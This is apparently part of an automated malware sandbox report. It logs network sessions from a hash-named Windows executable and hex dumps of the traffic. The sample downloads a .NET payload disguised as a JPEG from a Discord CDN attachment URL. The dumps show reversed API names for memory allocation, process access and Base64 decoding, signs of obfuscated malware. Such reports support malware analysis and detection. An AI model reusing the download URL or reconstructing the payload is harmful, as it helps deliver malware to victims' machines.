                                                  2022-04-23 06:14:59 UTC1111INData Raw: dd 41 45 f8 06 89 de 02 a5 39 1c bb 55 eb fc 2e d7 58 4f a2 68 92 cc 6a 93 10 22 8b 65 f2 81 5d fa 66 77 d0 3e 80 a3 6d 86 16 2b 88 6c d5 d3 1e f2 77 70 da 14 d3 01 a1 4d 93 bd 1a fc 3b 2f 85 3d fe f5 58 ed 2d 5d a9 1e 8d bf 1d ff 6d 2b 84 61 f5 ac 58 bd 2d a9 05 ba 79 26 a1 47 a9 8a 23 c0 4f 49 ce 79 88 e9 48 bb 24 0b ad 49 e8 94 39 c0 51 54 ff 10 99 4a fb 02 94 8c 0a e6 76 2f 95 6a d9 8b 4e bb 2e 49 e2 1d 8f bb 2e f8 71 34 92 6b ea f3 4a a3 3e 33 af 4a d8 f1 44 ad 3c 61 dc 3a 82 c1 04 f1 64 03 a8 57 c5 f1 64 af 3a 78 c2 27 a4 97 04 e9 78 5e c1 30 aa 91 39 cb 5f 29 c8 49 cc cd 7a 95 1a 6c cc 1d ad 90 3e d1 5f 01 9e 41 d7 fb 18 99 1c 1f a8 47 c8 fa 5a 8b 3a 73 cf 19 ca ae 03 e1 4c 6a ae 4b c9 fd 4b b8 2e 77 d5 3d e4 a6 06 ea 34 65 d4 3b ec 93 20 d3 4a 15
                                                  Data Ascii: AE9U.XOhj"e]fw>m+lwpM;/=X-]m+aX-y&G#OIyH$I9QTJv/jN.I.q4kJ>3JD<a:dWd:x'x^09_)Izl>_AGZ:sLjKK.w=4e; J
                                                  2022-04-23 06:14:59 UTC1127INData Raw: 00 2a 06 04 00 00 53 7d 04 00 00 54 7b 02 06 00 2b 0a 03 2b 26 03 2d 1e 06 00 00 77 73 16 f4 2b 0a f2 2b 04 00 00 50 7d 19 2b 26 0a 2d 18 02 26 26 09 2d 18 16 02 18 33 0a 00 00 21 6f 0a 00 00 20 28 04 00 00 52 7b 02 2a 33 fe 1f 04 00 00 50 7b 02 11 00 00 26 00 00 00 51 00 03 30 13 00 00 00 2a f6 2b 26 03 2b 04 00 00 51 7b 26 08 2d 18 19 02 00 00 00 00 00 00 00 11 00 0a 30 03 00 7a 0a 00 00 22 73 1a 00 00 00 2a f6 2b 26 03 2b 04 00 00 51 7b 26 08 2d 17 1d 02 00 00 00 00 00 00 00 11 00 0a 30 03 2a 16 ff ff fe fc 3f 69 8e 04 00 00 55 7b 02 04 00 00 57 7b 02 04 00 00 57 7d 58 1a 04 00 00 57 7b 02 02 04 00 00 50 7d 15 02 2a 17 04 00 00 50 7d 17 02 04 00 00 51 7d 06 02 04 00 00 4c 7d 9a 58 18 04 00 00 57 7b 02 04 00 00 55 7b 02 06 04 00 00 45 7d 07 06 04 00 00
                                                  Data Ascii: *S}T{++&-ws++P}+&-&&-3!o (R{*3P{&Q0*+&+Q{&-0z"s*+&+Q{&-0*?iU{W{W}XW{P}*P}Q}L}XW{U{E}


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  3192.168.2.649725162.159.129.233443C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-04-23 06:15:05 UTC1138OUTGET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1
                                                  Host: cdn.discordapp.com
                                                  Connection: Keep-Alive
                                                  2022-04-23 06:15:05 UTC1138INHTTP/1.1 200 OK
                                                  Date: Sat, 23 Apr 2022 06:15:05 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 387072
                                                  Connection: close
                                                  CF-Ray: 700476756d3768f8-FRA
                                                  Accept-Ranges: bytes
                                                  Age: 474
                                                  Cache-Control: public, max-age=31536000
                                                  ETag: "fce090eab4bfe6a3d63ebc34f3979aaf"
                                                  Expires: Sun, 23 Apr 2023 06:15:05 GMT
                                                  Last-Modified: Fri, 11 Feb 2022 19:48:42 GMT
                                                  Vary: Accept-Encoding
                                                  CF-Cache-Status: HIT
                                                  Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                  Cf-Bgj: h2pri
                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                  x-goog-generation: 1644608922184980
                                                  x-goog-hash: crc32c=wezq3g==
                                                  x-goog-hash: md5=/OCQ6rS/5qPWPrw085earw==
                                                  x-goog-metageneration: 1
                                                  x-goog-storage-class: STANDARD
                                                  x-goog-stored-content-encoding: identity
                                                  x-goog-stored-content-length: 387072
                                                  X-GUploader-UploadID: ADPycdtKqfssV5gXSEkEU-GSIerpxp8CHIbDYFk25SOnHq78HplyaMuQo1jVekgXmuj72goZFfCtCGw0Rr6hHXhhv5O64hS4RUso
                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zmoR%2FJjj5lWjzL2XLBRpGfENM1Oo2%2Bfqkh3dPjVclovi1JNthQkoQeSyYTGIPvTPbHJLahbjYsSxo%2B3cptwoSstJLZpeJfqGxZtrTgZSR7g%2FBgZo53ADyDCE53gl531NosCkCA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  2022-04-23 06:15:05 UTC1139INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  2022-04-23 06:15:05 UTC1141INData Raw: 00 00 02 00 00 00 04 00 00 00 00 00 00 00 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 fe ef 04 bd 00 00 00 00 00 4f 00 46 00 4e 00 49 00 5f 00 4e 00 4f 00 49 00 53 00 52 00 45 00 56 00 5f 00 53 00 56 00 00 00 34 02 e4 00 00 00 00 00 00 00 00 00 00 02 e4 00 06 00 58 00 00 00 48 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 30 00 00 00 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 18 00 00 00 10 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: ?OFNI_NOISREV_SV4XH0
                                                  2022-04-23 06:15:05 UTC1142INData Raw: 00 08 18 02 18 03 07 05 ed 81 11 35 12 01 02 00 08 05 1d 02 05 1d 02 18 08 06 07 0a 18 05 1d 02 07 05 0e 0e 02 07 04 a9 80 12 00 20 05 18 00 20 03 a1 80 12 00 00 05 02 02 02 02 e9 80 12 a5 80 12 75 12 02 08 07 0f 7d 12 0e 05 1d 02 20 07 0e 1d 0e 01 00 05 89 80 11 00 20 05 89 80 11 00 00 05 69 81 11 01 01 00 06 89 80 11 02 7d 12 71 81 12 02 05 07 0c 9c 80 12 01 07 05 08 08 0e 02 20 05 03 08 01 20 04 0e 0e 08 0e 08 0e 94 80 12 07 07 0b 1c 0e 0e 02 00 05 0d 00 20 03 49 82 11 00 20 05 bd 80 12 00 00 05 49 82 11 08 08 bd 80 12 04 07 0a 21 81 11 08 25 81 11 11 81 11 1d 81 11 0e 01 06 20 11 08 08 05 1d 0e 03 20 07 0e 01 01 00 04 02 0e 02 03 07 05 05 1d 0e 01 02 00 06 d5 80 11 0e 01 00 06 0e 01 81 12 01 00 06 98 80 11 0e 0e 0e 04 07 08 05 1d 08 39 81 12 03 07 08
                                                  Data Ascii: 5 u} i}q I I!% 9
                                                  2022-04-23 06:15:05 UTC1143INData Raw: 36 31 08 72 65 64 6c 69 75 42 65 63 72 75 6f 73 65 52 64 65 70 79 54 79 6c 67 6e 6f 72 74 53 2e 73 6c 6f 6f 54 2e 73 65 63 72 75 6f 73 65 52 2e 6d 65 74 73 79 53 33 00 01 41 00 00 00 00 00 15 00 01 08 00 00 00 00 00 14 00 01 08 00 00 00 00 00 13 00 01 08 0e 1d 00 28 04 00 00 00 00 00 12 00 01 08 00 00 00 00 00 11 00 01 08 24 11 00 28 04 00 00 00 00 00 10 00 01 08 00 00 00 00 00 0f 00 01 08 00 00 00 00 00 0e 00 01 08 b8 80 12 00 28 05 00 00 00 00 00 0d 00 01 08 00 00 00 00 00 0c 00 01 08 00 00 00 00 00 0b 00 01 08 00 00 00 00 00 0a 00 01 08 00 00 00 00 00 09 00 01 08 00 00 00 00 00 08 00 01 08 00 00 00 00 00 07 00 01 08 0c 81 12 00 28 05 00 00 00 00 00 06 00 01 08 60 12 00 28 04 08 00 28 03 ac 80 11 00 28 05 4c 11 00 28 04 d5 81 11 01 01 20 06 00 00 00 00
                                                  Data Ascii: 61redliuBecruoseRdepyTylgnortS.slooT.secruoseR.metsyS3A($(((`(((L(
                                                  2022-04-23 06:15:05 UTC1145INData Raw: 12 18 01 20 06 1c 39 12 18 e5 80 12 03 20 09 18 18 01 20 04 02 10 18 02 02 00 06 02 0e 0e 02 03 00 06 09 10 09 19 18 02 04 00 08 0e 10 18 18 02 00 06 22 01 0e 10 18 01 00 05 09 10 09 18 18 02 04 00 08 08 2d 82 12 18 18 09 04 00 09 18 02 01 00 04 02 01 18 02 78 11 18 03 00 07 08 01 08 2a 02 09 10 09 18 1d 02 03 00 08 2d 82 12 18 09 18 18 04 00 09 08 2d 82 12 18 08 03 00 08 c5 80 11 10 08 0a 02 00 08 08 70 12 08 02 03 00 07 08 10 08 08 02 00 06 08 2d 82 12 08 01 03 00 08 08 08 08 18 18 04 00 07 08 08 2d 82 12 08 08 08 05 00 0a 08 00 00 03 6c 11 08 01 00 05 68 12 06 03 05 1d 01 01 20 05 05 1d 00 20 04 0e 00 20 03 02 01 01 20 04 05 1d 06 03 e5 80 12 02 01 20 06 1c 39 12 08 e5 80 12 03 20 09 08 02 01 20 04 18 1c 01 02 20 05 08 08 02 02 20 05 5c 12 25 82 12 25
                                                  Data Ascii: 9 "-x*--p--lh 9 \%%
                                                  2022-04-23 06:15:05 UTC1146INData Raw: 54 00 77 6f 4e 5f 74 65 67 00 65 6d 61 4e 72 65 73 55 5f 74 65 67 00 6c 6f 63 6f 74 6f 72 50 79 74 69 72 75 63 65 53 5f 74 65 73 00 66 4f 78 65 64 6e 49 00 6e 69 4d 00 74 61 6d 72 6f 46 00 73 64 6e 6f 63 65 53 6c 61 74 6f 54 5f 74 65 67 00 64 65 73 70 61 6c 45 5f 74 65 67 00 77 65 4e 74 72 61 74 53 00 65 6d 61 4e 79 72 6f 74 63 65 72 69 44 74 65 47 00 65 74 65 6c 65 44 00 73 65 74 79 42 6c 6c 41 65 74 69 72 57 00 68 74 61 50 72 65 64 6c 6f 46 74 65 47 00 79 72 6f 74 63 65 72 69 44 65 74 61 65 72 43 00 68 74 61 50 70 6d 65 54 74 65 47 00 64 6e 65 70 70 41 00 67 6e 69 72 74 73 62 75 53 00 68 74 69 57 73 74 72 61 74 53 00 6d 69 72 54 00 6d 6f 72 46 64 61 6f 4c 00 67 6e 69 72 74 53 34 36 65 73 61 42 6f 54 00 74 6e 61 69 72 61 76 6e 49 72 65 70 70 55 6f 54 00
                                                  Data Ascii: TwoN_tegemaNresU_teglocotorPytiruceS_tesfOxednIniMtamroFsdnoceSlatoT_tegdespalE_tegweNtratSemaNyrotceriDteGeteleDsetyBllAetirWhtaPredloFteGyrotceriDetaerChtaPpmeTteGdneppAgnirtsbuShtiWstratSmirTmorFdaoLgnirtS46esaBoTtnairavnIreppUoT
                                                  2022-04-23 06:15:05 UTC1147INData Raw: 64 6f 4d 74 65 47 00 73 65 6c 75 64 6f 4d 73 73 65 63 6f 72 50 6d 75 6e 45 00 78 45 65 6d 61 4e 65 6c 69 46 65 6c 75 64 6f 4d 74 65 47 00 65 6c 64 6e 61 48 65 73 6f 6c 43 00 73 73 65 63 6f 72 50 6e 65 70 4f 00 73 65 73 73 65 63 6f 72 50 6d 75 6e 45 00 65 67 61 73 73 65 4d 64 6e 65 53 00 74 78 65 54 77 6f 64 6e 69 57 74 65 47 00 74 63 65 52 77 6f 64 6e 69 57 74 65 47 00 73 77 6f 64 6e 69 57 64 6c 69 68 43 6d 75 6e 45 00 64 49 73 73 65 63 6f 72 50 64 61 65 72 68 54 77 6f 64 6e 69 57 74 65 47 00 65 6d 61 4e 73 73 61 6c 43 74 65 47 00 63 6f 6c 6c 41 6c 61 75 74 72 69 56 00 6f 66 6e 49 6f 65 47 74 65 47 00 44 49 43 4c 74 6c 75 61 66 65 44 72 65 73 55 74 65 47 00 44 49 6f 65 47 72 65 73 55 74 65 47 00 61 00 6c 6f 64 71 67 6b 4d 00 02 80 80 e2 88 80 e2 8b 80 e2
                                                  Data Ascii: doMteGseludoMssecorPmunExEemaNeliFeludoMteGeldnaHesolCssecorPnepOsessecorPmunEegasseMdneStxeTwodniWteGtceRwodniWteGswodniWdlihCmunEdIssecorPdaerhTwodniWteGemaNssalCteGcollAlautriVofnIoeGteGDICLtluafeDresUteGDIoeGresUteGalodqgkM
                                                  2022-04-23 06:15:05 UTC1149INData Raw: 74 6e 75 52 2e 6d 65 74 73 79 53 00 65 74 75 62 69 72 74 74 41 6b 72 6f 77 65 6d 61 72 46 74 65 67 72 61 54 00 65 74 75 62 69 72 74 74 41 72 65 74 6e 69 6f 50 6e 6f 69 74 63 6e 75 46 64 65 67 61 6e 61 6d 6e 55 00 74 6e 65 6d 6e 6f 72 69 76 6e 45 65 6d 69 74 6e 75 52 00 6c 61 68 73 72 61 4d 00 65 74 75 62 69 72 74 74 41 65 6c 62 69 73 69 56 6d 6f 43 00 73 65 63 69 76 72 65 53 70 6f 72 65 74 6e 49 2e 65 6d 69 74 6e 75 52 2e 6d 65 74 73 79 53 00 6e 6f 69 74 6e 65 76 6e 6f 43 67 6e 69 6c 6c 61 43 00 73 72 65 70 6c 65 48 65 6d 69 74 6e 75 52 00 65 74 75 62 69 72 74 74 41 79 74 69 6c 69 62 69 74 61 70 6d 6f 43 65 6d 69 74 6e 75 52 00 65 6c 69 74 61 6c 6f 56 73 49 00 73 65 63 69 76 72 65 53 72 65 6c 69 70 6d 6f 43 2e 65 6d 69 74 6e 75 52 2e 6d 65 74 73 79 53 00
                                                  Data Ascii: tnuR.metsySetubirttAkrowemarFtegraTetubirttAretnioPnoitcnuFdeganamnUtnemnorivnEemitnuRlahsraMetubirttAelbisiVmoCsecivreSporetnI.emitnuR.metsySnoitnevnoCgnillaCsrepleHemitnuRetubirttAytilibitapmoCemitnuRelitaloVsIsecivreSrelipmoC.emitnuR.metsyS
                                                  2022-04-23 06:15:05 UTC1150INData Raw: 53 73 73 65 63 6f 72 50 00 6e 6f 69 74 63 65 6c 6c 6f 43 65 6c 75 64 6f 4d 73 73 65 63 6f 72 50 00 65 6c 75 64 6f 4d 73 73 65 63 6f 72 50 00 73 73 65 63 6f 72 50 00 65 74 75 62 69 72 74 74 41 65 64 6f 43 72 65 73 55 6e 6f 4e 72 65 67 67 75 62 65 44 00 65 74 75 62 69 72 74 74 41 6e 65 64 64 69 48 72 65 67 67 75 62 65 44 00 65 74 61 74 53 65 6c 62 61 73 77 6f 72 42 72 65 67 67 75 62 65 44 00 73 63 69 74 73 6f 6e 67 61 69 44 2e 6d 65 74 73 79 53 00 65 74 75 62 69 72 74 74 41 65 6c 62 61 73 77 6f 72 42 72 65 67 67 75 62 65 44 00 65 74 61 67 65 6c 65 44 00 65 6d 69 54 65 74 61 44 00 74 72 65 76 6e 6f 43 00 6c 65 64 6f 4d 74 6e 65 6e 6f 70 6d 6f 43 2e 6d 65 74 73 79 53 00 6e 6f 69 74 70 65 63 78 45 32 33 6e 69 57 00 64 65 7a 69 6c 61 69 63 65 70 53 2e 73 6e 6f
                                                  Data Ascii: SssecorPnoitcelloCeludoMssecorPeludoMssecorPssecorPetubirttAedoCresUnoNreggubeDetubirttAneddiHreggubeDetatSelbasworBreggubeDscitsongaiD.metsySetubirttAelbasworBreggubeDetageleDemiTetaDtrevnoCledoMtnenopmoC.metsySnoitpecxE23niWdezilaicepS.sno
                                                  2022-04-23 06:15:05 UTC1151INData Raw: 32 00 2f 00 31 00 2f 00 30 00 24 00 27 00 24 00 26 00 24 00 25 00 20 00 24 00 20 00 23 00 20 00 22 00 20 00 21 00 19 00 1f 00 19 00 1e 00 19 00 1d 00 19 00 1c 00 19 00 1b 00 19 00 1a 00 16 00 17 00 15 00 16 00 0e 00 0f 00 04 00 07 00 04 00 06 00 04 00 05 00 02 00 03 00 00 00 eb 00 00 00 02 00 05 08 04 00 00 00 ca 00 00 00 02 00 00 00 00 00 00 00 00 00 67 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 5b 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 49 00 0a 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 3c 00 13 00 00 00 00 00 00 00 00 00 04 00 02 00 00 00 00 00 35 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 26 00 0a 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 1d 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00
                                                  Data Ascii: 2/1/0$'$&$% $ # " !g[I<5&
                                                  2022-04-23 06:15:05 UTC1153INData Raw: 08 40 08 39 08 2b 08 27 08 22 08 1e 00 1f 00 00 00 00 00 01 00 1d 00 00 00 00 00 01 00 07 00 00 00 63 00 01 00 06 00 00 00 0d 00 01 00 05 00 00 00 0c 00 01 02 10 00 c5 02 10 00 c1 01 e6 00 bf 01 e6 00 b7 01 e6 00 af 01 f0 00 a5 01 f0 00 a1 01 e6 00 9d 01 e3 00 99 05 fe 00 64 05 ee 00 1b 14 41 05 ee 00 1b 14 21 05 ee 00 1b 12 81 05 ee 00 1b 12 61 05 ee 00 1b 12 41 05 ee 00 1b 12 21 05 ee 00 1b 12 01 05 ee 00 1b 11 e1 05 ee 00 1b 11 c1 05 ee 00 1b 11 a1 05 ee 00 1b 11 81 05 ee 00 1b 11 61 05 ee 00 1b 11 41 05 ee 00 1b 11 21 05 ee 00 1b 11 01 05 ee 00 1b 10 e1 05 ee 00 1b 10 c1 05 ee 00 1b 10 a1 05 ee 00 1b 10 81 05 ee 00 1b 10 61 05 ee 00 1b 10 41 05 ee 00 1b 10 21 05 ee 00 1b 10 01 00 5c 00 23 0f c0 00 5c 00 23 0f a0 05 ee 00 1b 0f 81 00 5c 00 23 0f 80 05
                                                  Data Ascii: @9+'"cdA!aA!aA!aA!\#\#\#
                                                  2022-04-23 06:15:05 UTC1154INData Raw: 54 08 cf 11 98 00 54 04 5a 15 44 04 29 0d ad 12 50 02 81 08 45 15 38 04 41 0d a7 0d 88 04 29 01 76 12 50 04 59 0d a0 13 bc 04 59 09 3c 15 25 03 01 08 87 10 8c 00 54 00 28 0d 88 00 54 00 70 0c 20 00 09 0c f4 15 20 03 b9 00 23 0d 88 01 01 01 8f 15 0e 03 b9 0a 5c 11 8c 02 91 0c e5 14 fe 03 a1 02 e1 14 ec 02 69 00 28 0d 88 02 f9 0c c5 14 dc 01 49 09 42 14 d3 04 29 01 76 14 cb 04 29 01 76 14 bc 01 49 02 c8 0e 0d 00 f1 0c c9 14 b0 01 41 0c c5 14 a5 01 41 0c bf 14 93 01 41 0c a7 14 86 02 e1 0c a1 11 6b 04 29 01 76 10 83 02 59 01 76 12 50 01 11 0c 9b 14 76 01 11 0c 95 14 6e 01 11 02 e1 14 61 01 a1 07 a5 10 b0 00 f9 00 28 0d 88 00 f9 00 28 0d 88 02 e1 0c 8e 14 4c 02 d9 0c 75 13 b2 04 29 0c 70 14 44 04 29 04 a2 14 40 02 c1 00 a8 0d 88 04 99 0c 5e 14 39 04 29 0c 5a
                                                  Data Ascii: TTZD)PE8A)vPYY<%T(Tp #\i(IB)v)vIAAAk)vYvPvna((Lu)pD)@^9)Z
                                                  2022-04-23 06:15:05 UTC1155INData Raw: 00 0a 00 03 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 9a 00 07 00 00 0c 70 00 06 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 9a 00 07 00 00 0c 70 00 06 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00
                                                  Data Ascii: pln)' ln)' ' n)' ' ' )' pln)'
                                                  2022-04-23 06:15:05 UTC1157INData Raw: 01 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 9a 00 07 00 00 0c 70 00 06 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c a1 00 0c 00 00 0c c9 00 0b 00 00 0c 77 00 0a 00 00 0c 49 00 09 00 00 0c 22 00 08 00 00 0c 9a 00 07 00 00
                                                  Data Ascii: n)' ' ' n)' ' ' ' pln)' ln)' ' )' wI"
                                                  2022-04-23 06:15:05 UTC1158INData Raw: 00 00 01 c9 00 1c 0e 32 00 91 00 00 00 00 85 00 01 c9 00 1c 0e 2a 00 96 00 00 00 00 83 74 01 c8 05 e7 0c 20 00 91 00 00 00 00 83 58 01 c8 04 64 0c 20 00 93 00 00 00 00 83 50 01 c7 05 e0 0c 20 00 91 00 00 00 00 83 34 01 c7 05 da 0c 20 00 93 00 00 00 00 83 2c 01 c6 05 ce 0c 20 00 93 00 00 00 00 82 dc 01 c5 05 c7 0c 20 00 93 00 00 00 00 82 90 01 c5 00 1c 0c 20 00 93 00 00 00 00 82 10 01 c5 00 1c 0c 20 00 93 00 00 00 00 81 a0 01 c5 00 1c 0c 20 00 93 00 00 00 00 80 c8 01 c5 02 57 0c 20 00 93 00 00 00 00 7f f4 01 c4 02 5b 0c 20 00 93 00 00 00 00 7f 64 01 c4 00 28 0d 88 18 86 00 00 00 00 7f 44 01 c4 05 c2 0c 20 00 93 00 00 00 00 7f 04 01 c3 05 bb 0c 20 00 93 00 00 00 00 7e e8 01 c3 05 b5 0c 20 00 93 00 00 00 00 7e cc 01 c3 05 af 0c 20 00 93 00 00 00 00 7e 70 01
                                                  Data Ascii: 2*t Xd P 4 , W [ d(D ~ ~ ~p
                                                  2022-04-23 06:15:05 UTC1159INData Raw: 00 00 00 74 38 01 36 04 b6 0c 20 00 83 00 00 00 00 74 18 01 35 00 a8 0c 29 00 83 00 00 00 00 73 f8 01 35 01 76 0c 29 00 83 00 00 00 00 73 d8 01 34 01 71 0c 20 00 83 00 00 00 00 73 b8 01 34 00 2c 0c 20 00 83 00 00 00 00 73 98 01 33 00 a8 0c 27 00 83 00 00 00 00 73 78 01 33 01 76 0c 27 00 83 00 00 00 00 73 58 01 32 00 a8 0c 20 00 83 00 00 00 00 73 38 01 32 01 76 0c 20 00 83 00 00 00 00 73 18 01 31 00 23 0c 20 00 83 00 00 00 00 72 f8 01 31 00 30 0c 20 00 83 00 00 00 00 72 d8 01 31 00 28 0d 88 18 86 00 00 00 00 72 b8 01 31 00 1c 0c 20 00 93 00 00 00 00 72 3c 01 31 00 1c 0c 20 00 93 00 00 00 00 71 44 01 31 02 57 0c 20 00 93 00 00 00 00 70 4c 01 31 00 1c 0c 20 00 93 00 00 00 00 6e d0 01 31 00 28 0d 9d 05 c6 00 00 00 00 00 00 01 31 00 34 0d 9d 05 c6 00 00 00 00
                                                  Data Ascii: t86 t5)s5v)s4q s4, s3'sx3v'sX2 s82v s1# r10 r1(r1 r<1 qD1W pL1 n1(14
                                                  2022-04-23 06:15:05 UTC1161INData Raw: 01 c6 00 03 00 00 00 00 00 df 03 b1 0d d2 01 c6 00 03 00 00 00 00 00 dd 01 51 0d 88 18 86 00 03 00 00 00 00 00 dc 01 66 0d e5 01 c6 00 03 00 00 00 00 00 d8 03 4b 0d d9 01 c6 00 03 00 00 00 00 00 d6 03 44 0d d2 01 c6 00 03 00 00 00 00 00 d4 01 51 0d 88 18 86 00 03 00 00 00 00 00 d2 03 a8 0d e5 01 c6 00 03 00 00 00 00 00 cb 03 98 0d d9 01 c6 00 03 00 00 00 00 00 c6 03 8d 0d d2 01 c6 00 03 00 00 00 00 00 c4 01 51 0d 88 18 86 00 03 00 00 00 00 00 c1 03 80 0d e5 01 c6 00 03 00 00 00 00 00 b5 03 69 0d d9 01 c6 00 03 00 00 00 00 00 ab 03 57 0d d2 01 c6 00 03 00 00 00 00 00 a9 01 51 0d 88 18 86 00 03 00 00 00 00 00 a8 01 66 0d e5 01 c6 00 03 00 00 00 00 00 a4 03 4b 0d d9 01 c6 00 03 00 00 00 00 00 a2 03 44 0d d2 01 c6 00 03 00 00 00 00 00 a0 01 51 0d 88 18 86 00
                                                  Data Ascii: QfKDQQiWQfKDQ
                                                  2022-04-23 06:15:05 UTC1162INData Raw: af 0c 20 20 93 00 80 00 00 00 00 00 3b 01 a6 0c 20 20 93 00 80 00 00 00 00 00 37 01 9e 0c 20 20 93 00 80 00 00 00 00 00 32 01 93 0c 20 20 93 00 80 00 00 00 00 00 32 01 8f 0c 20 20 93 00 80 00 00 00 00 00 31 01 89 0c 20 20 93 00 80 00 00 00 00 00 30 01 71 0c 29 00 83 00 00 00 00 3c f4 00 30 00 2c 0c 29 00 83 00 00 00 00 3c d4 00 2f 01 7f 0c 20 00 83 00 00 00 00 3c b4 00 2f 01 7a 0c 20 00 83 00 00 00 00 3c 94 00 2e 00 a8 0c 20 00 83 00 00 00 00 3c 74 00 2e 01 76 0c 20 00 83 00 00 00 00 3c 54 00 2d 01 71 0c 27 00 83 00 00 00 00 3c 34 00 2d 00 2c 0c 27 00 83 00 00 00 00 3c 14 00 2c 01 71 0c 20 00 83 00 00 00 00 3b f4 00 2c 00 2c 0c 20 00 83 00 00 00 00 3b d4 00 2c 00 28 0d 88 18 86 00 00 00 00 3b b4 00 2b 01 66 0d e5 01 c6 00 03 00 00 00 00 00 28 01 5c 0d d9
                                                  Data Ascii: ; 7 2 2 1 0q)<0,)</ </z <. <t.v <T-q'<4-,'<,q ;,, ;,(;+f(\
                                                  2022-04-23 06:15:05 UTC1163INData Raw: 0c 6e 00 01 00 9d 0c 29 00 01 00 9d 0c 27 00 01 01 11 0c 20 00 01 02 dc 0c 20 00 11 02 d7 0c 6e 80 56 02 d7 0c 29 80 56 02 d7 0c 27 80 56 02 d7 0c 20 80 56 00 20 0d bb 06 06 00 20 0c 22 00 01 00 9d 0c 9a 00 01 02 b4 0c 70 00 01 00 9d 0c 6c 00 06 00 9d 0c 6e 00 01 00 20 0c 29 00 01 02 af 0c 27 00 01 00 20 0c 20 00 01 02 aa 0c 27 00 01 00 9d 0c 20 00 21 00 9d 0c a1 00 01 00 9d 0c c9 00 06 00 89 0c 77 00 06 00 89 0c 49 00 06 00 89 0c 22 00 06 00 89 0c 9a 00 06 00 89 0c 70 00 06 00 89 0c 6c 00 06 00 9d 0c 6e 00 06 00 9d 0c 29 00 06 00 9d 0c 27 00 01 00 9d 0c 20 00 06 00 20 0c 29 00 01 00 20 0c 27 00 01 01 6d 0c 20 00 01 02 73 0c 20 00 33 00 89 0c 9a 00 06 00 9d 0c 70 